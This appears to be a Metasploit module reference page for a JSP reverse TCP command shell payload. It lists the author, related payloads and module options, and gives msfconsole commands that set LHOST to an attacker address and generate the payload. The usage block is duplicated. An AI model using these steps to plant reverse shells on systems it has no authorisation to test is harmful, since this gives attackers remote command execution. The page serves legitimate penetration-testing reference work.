Java JSP Command Shell, Reverse TCP Inline
Connect back to attacker and spawn a command shell
Rank
- Normal
Authors
- sf < stephen_fewer [at] harmonysecurity.com >
Similar Modules
- payload/java/jsp_shell_bind_tcp
- payload/java/meterpreter/bind_tcp
- payload/java/meterpreter/reverse_http
- payload/java/meterpreter/reverse_https
- payload/java/meterpreter/reverse_tcp
- payload/java/shell/bind_tcp
- payload/java/shell/reverse_tcp
- payload/java/shell_reverse_tcp
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/java/jsp_shell_reverse_tcp
msf payload(jsp_shell_reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(jsp_shell_reverse_tcp) > generate
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/java/jsp_shell_reverse_tcp
msf payload(jsp_shell_reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(jsp_shell_reverse_tcp) > generate
Module Options
| LHOST | The listen address |
| LPORT | The listen port (default: 4444) |
| SHELL | The system shell to use. (default: cmd.exe) |
| AutoRunScript | A script to run automatically on session creation. |
| InitialAutoRunScript | An initial script to run on session creation (before AutoRunScript) |
| ReverseConnectRetries | The number of connection attempts to try before exiting the process |
| ReverseListenerBindAddress | The specific IP address to bind to on the local system |
| ReverseListenerComm | The specific communication channel to use for this listener |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |